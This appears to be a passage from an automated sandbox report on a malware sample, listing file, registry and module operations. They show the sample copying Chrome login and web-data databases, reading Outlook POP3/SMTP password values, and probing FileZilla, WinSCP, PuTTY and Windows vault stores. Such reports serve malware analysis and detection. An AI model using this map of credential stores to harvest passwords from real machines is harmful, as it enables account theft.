2 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | type = size, size_out = 0 |
|
2 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | type = file_attributes |
|
3 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-journal | type = file_attributes |
|
6 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak-wal | type = file_attributes |
|
6 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | type = size, size_out = 0 |
|
6 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\filezilla\recentservers.xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\2XC7u663GxWc\AppData\Roaming\filezilla\sitemanager.xml | type = file_attributes |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
2 | |
| Copy | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | source_filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data |
|
1 | |
| Copy | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | source_filename = C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data |
|
1 | |
| Read | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | size = 100, size_out = 100 |
|
1 | |
| Read | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | size = 2048, size_out = 2048 |
|
2 | |
| Read | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak | size = 16, size_out = 16 |
|
1 | |
| Read | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | size = 100, size_out = 100 |
|
3 | |
| Read | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | size = 2048, size_out = 2048 |
|
15 | |
| Read | C:\Users\2XC7u663GxWc\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak | size = 16, size_out = 16 |
|
3 |
Registry (113)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0c8c9c3ec3550644a047b86a8ec12a8b | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\1b84e156774e864ab4a15c6403c9f6e3 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2970052ff0fefa4086a30daf18dd86cf | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8fe7ac01aa79754a8f735e7cc12f5d47 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\95a84a5145e1b7428591aa8b63570f22 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\98abf245da169742aaaaf5b0bdd4dea8 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\adf5b6e3c063d3459407b9def7e90514 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c5d2c4710d70ab4c8917b715c91bcb5a | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ce1460b2d4cad64e96fa40180c6297a9 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\fdd8a1fc7778114da9ed4f04391d9dea | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command | data = "C:\Program Files\Mozilla Firefox\firefox.exe", type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = Email, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Email, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = Email, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 Server, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 User, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 Password, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP Server, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP Server, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP User, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP Password, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTP Server, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 | value_name = Email, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary | value_name = Email, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0c8c9c3ec3550644a047b86a8ec12a8b | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\1b84e156774e864ab4a15c6403c9f6e3 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2970052ff0fefa4086a30daf18dd86cf | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8fe7ac01aa79754a8f735e7cc12f5d47 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\95a84a5145e1b7428591aa8b63570f22 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\98abf245da169742aaaaf5b0bdd4dea8 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\adf5b6e3c063d3459407b9def7e90514 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c5d2c4710d70ab4c8917b715c91bcb5a | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ce1460b2d4cad64e96fa40180c6297a9 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\fdd8a1fc7778114da9ed4f04391d9dea | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} | - |
|
1 |
Module (486)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c00000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x774c0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76cd0000 |
|
1 | |
| Load | USERENV.dll | base_address = 0x74b30000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x771d0000 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x75610000 |
|
1 | |
| Load | WININET.dll | base_address = 0x77230000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x77330000 |
|
1 | |
| Load | WTSAPI32.dll | base_address = 0x73f10000 |
|
1 | |
| Load | SHELL32.dll | base_address = 0x75bb0000 |
|
1 | |
| Load | WS2_32.dll | base_address = 0x75a90000 |
|
1 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x0 |
|
4 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x6c330000 |
|
4 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x0 |
|
8 | |
| Load | kernel32 | base_address = 0x0 |
|
4 | |
| Load | kernel32 | base_address = 0x76b10000 |
|
4 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x0 |
|
4 | |
| Load | vaultcli.dll | base_address = 0x73940000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | nss3.dll | base_address = 0x722a0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76b10000 |
|
4 | |
| Get Handle | c:\windows\system32\shell32.dll | base_address = 0x75bb0000 |
|
5 | |
| Get Handle | c:\windows\system32\ws2_32.dll | base_address = 0x75a90000 |
|
18 | |
| Get Handle | c:\windows\system32\urlmon.dll | base_address = 0x76850000 |
|
2 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x774c0000 |
|
1 | |
| Get Filename | api-ms-win-core-localization-l1-2-1 | process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileAttributesW, address_out = 0x76b664ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76b5bb80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnmapViewOfFile, address_out = 0x76b5db13 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapValidate, address_out = 0x76b525dd |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapSize, address_out = 0x77389bec |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x76b6452b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76b76a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FormatMessageW, address_out = 0x76b554a3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDiskFreeSpaceA, address_out = 0x76b6d7d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileAttributesA, address_out = 0x76b61de6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileAttributesExW, address_out = 0x76b5273d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = OutputDebugStringW, address_out = 0x76b46b91 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushViewOfFile, address_out = 0x76b483d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x76b5cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObjectEx, address_out = 0x76b5bab0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExA, address_out = 0x76b63861 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x76b547cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileW, address_out = 0x76b50f62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76b63728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapCompact, address_out = 0x76b47cf6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapDestroy, address_out = 0x76b52301 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnlockFile, address_out = 0x76b76417 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileMappingA, address_out = 0x76b597e9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LockFileEx, address_out = 0x76b7692f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76b50273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76b5cac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileW, address_out = 0x76b5cc56 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibrary, address_out = 0x76b5d9d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76b62fde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTime, address_out = 0x76b5ced8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FormatMessageA, address_out = 0x76b78868 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileMappingW, address_out = 0x76b50a7f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MapViewOfFile, address_out = 0x76b5899b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76b5bb9f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount, address_out = 0x76b5ba60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushFileBuffers, address_out = 0x76b47f81 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualFree, address_out = 0x76b61da4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualAlloc, address_out = 0x76b62fb6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x76b5cdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetEvent, address_out = 0x76b5bccc |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ResetEvent, address_out = 0x76b5bcb4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76b63386 |
|
1 | |
